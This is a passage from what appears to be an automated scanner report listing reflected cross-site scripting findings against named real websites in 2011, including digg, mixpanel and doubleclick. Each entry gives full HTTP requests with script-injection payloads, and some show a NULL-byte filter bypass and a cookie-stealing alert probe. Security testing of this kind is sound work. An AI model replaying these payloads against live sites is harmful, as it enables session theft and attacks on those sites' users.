ZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42744246");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b5"-alert(1)-"f722fd7d7a6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

Note that the scanner's parameter label does not match the request shown below: the payload was appended to the value of the sa query-string parameter (sa=l...), the first parameter after the ? in the click= URL, while sz=728x90 in the path is untouched. The reflection context is the same escape("...") string as in 2.1 to 2.5.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:33 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b3c/f/1d6/%2a/k%3B231248095%3B0-0%3B0%3B55400195%3B3454-728/90%3B42236289/42254076/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhz
...[SNIP]...

2.7. http://adonmax.com/afr.php [campaignid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The value of the campaignid request parameter is copied into the HTML document as plain text between tags. The payload d4501<script>alert(1)</script>6546b61c730 was submitted in the campaignid parameter. This input was echoed unmodified in the application's response.

Because the query string is delimited with semicolons rather than ampersands, the scanner treats everything after ?campaignid= as a single parameter, and the payload is appended to its ct0=gevalia.com tail. The reflection itself is in a 404 page carrying X-Powered-By: PHP/5.2.17, not in afr.php's normal output: the error document prints the raw request URI without entity encoding (Apache's stock 404 page encodes it), so the same issue reproduces for any path on the host, as 2.8 and 2.9 show.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:37 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 384
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 was not found on this server.</p>
...[SNIP]...

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 862c4<script>alert(1)</script>f0820835d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. As in 2.7, the echo is the raw request URI inside the host's PHP-generated 404 page, so the parameter name is incidental: any part of the URI is reflected.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:38 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 was not found on this server.</p>
...[SNIP]...

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2267d<script>alert(1)</script>65805352abf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This is the same request-URI reflection in the 404 page as 2.7 and 2.8; favicon.ico is simply the path the crawler happened to request, and any non-existent path on adonmax.com would do.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2267d<script>alert(1)</script>65805352abf HTTP/1.1
Host: adonmax.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:27:41 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 327
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico2267d<script>alert(1)</script>65805352abf was not found on this server.</p>
...[SNIP]...

2.10. http://api.mixpanel.com/track/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.mixpanel.com
Path:   /track/

Issue detail

The value of the callback request parameter is copied verbatim to the start of the response body, where it becomes the name of the JSONP function call. The payload f560e<script>alert(1)</script>a9d72cefb0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

The response is served as text/javascript rather than as an HTML document, so the scanner's generic "plain text between tags" description does not fit this finding. The <script> probe in the body only executes if a browser can be made to render the response as HTML; the response sets no X-Content-Type-Options: nosniff header to rule that out. The direct consequence of an unrestricted callback name is that any requester controls the opening bytes of a script that pages such as www.bebo.com load from api.mixpanel.com. The response also carries Access-Control-Allow-Origin: *.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJtcF9wYWdlIjogImh0dHA6Ly93d3cuYmViby5jb20vIiwidG9rZW4iOiAiOTYxMTBkM2JmZGI3YmM3ZmYwYzNjM2U0MDhkMDIyMmIiLCJ0aW1lIjogMTMwOTk1MTMwNH19&ip=1&callback=mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0&_=1309951304288 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Wed, 06 Jul 2011 11:22:10 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 68

mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0(1);

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viximo.com
Path:   /api/v3/publishers/bebo.json

Issue detail

The value of the callback request parameter is copied verbatim to the start of the response body, where it becomes the name of the JSONP function call. The payload f5abb<script>alert(1)</script>769dda3a9be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

As with 2.10, the body is not an HTML document: it is labelled application/json (although a JSONP wrapper is JavaScript, not JSON), so the <script> probe only fires where a browser renders the response as HTML. No X-Content-Type-Options: nosniff header is set. The callback name should be restricted to a dotted JavaScript identifier before it is written into the response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v3/publishers/bebo.json?callback=viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be HTTP/1.1
Host: api.viximo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Wed, 06 Jul 2011 11:22:29 GMT
ETag: "71f99547f2ad6ad86b6f344aad90c979"
Server: nginx/0.7.65
Status: 200 OK
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.00955
Content-Length: 15840
Connection: keep-alive

viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be({body: {"publisher": {"uses_promo_bar": true, "profile_url": "http://www.bebo.com/Profile.jsp?MemberId={{user_id}}", "theme_enabled": true, "uses_gift_wrap": true, "uses_message_center": true, "offer_
...[SNIP]...

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://blog.metricstream.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b953d'><script>alert(1)</script>19229b4da23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b953d\'><script>alert(1)</script>19229b4da23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b953d'><script>alert(1)</script>19229b4da23=1 HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32430

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>

<!-- feeds -->
<link rel="
...[SNIP]...
<a href='https://blog.metricstream.com/page/2/?b953d\'><script>alert(1)</script>19229b4da23=1' class="inactive">
...[SNIP]...

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload da4dd<script>alert(1)</script>e5b77016dd7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1da4dd<script>alert(1)</script>e5b77016dd7&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:15 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "169d3f95eedfc376e2b2695425fb43113203fccb"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1da4dd<script>alert(1)</script>e5b77016dd7", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f6022<script>alert(1)</script>c416b9d548d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bf6022<script>alert(1)</script>c416b9d548d HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:25 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "fb0e3943f6866607c9d82a370bb7c2e809b158e8"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);f6022<script>alert(1)</script>c416b9d548d

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2cec"><script>alert(1)</script>5e1f327096a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a2cec"><script>alert(1)</script>5e1f327096a=1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=2ca757a04da66628966d82294dbe49583144ee4d69a172ca708f21056e34ef90; expires=Thu, 07-Jul-2011 11:37:18 GMT; path=/; domain=digg.com
X-Digg-Time: D=251801 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101254

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg - The Latest News Headlines, Videos and Images" href="/?a2cec"><script>alert(1)</script>5e1f327096a=1.rss">
...[SNIP]...

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00186dc"><script>alert(1)</script>11a0bd260e7 was submitted in the REST URL parameter 1. This input was echoed as 186dc"><script>alert(1)</script>11a0bd260e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=408863 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18136

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl.rss">
...[SNIP]...

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ad4b"><script>alert(1)</script>2bf41c450a6 was submitted in the REST URL parameter 2. This input was echoed as 2ad4b"><script>alert(1)</script>2bf41c450a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=280116 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18137

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl.rss">
...[SNIP]...

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019fdd"><script>alert(1)</script>7a8b0f85e9c was submitted in the REST URL parameter 3. This input was echoed as 19fdd"><script>alert(1)</script>7a8b0f85e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=212072 10.2.128.108
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c.rss">
...[SNIP]...

2.19. http://digg.com/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

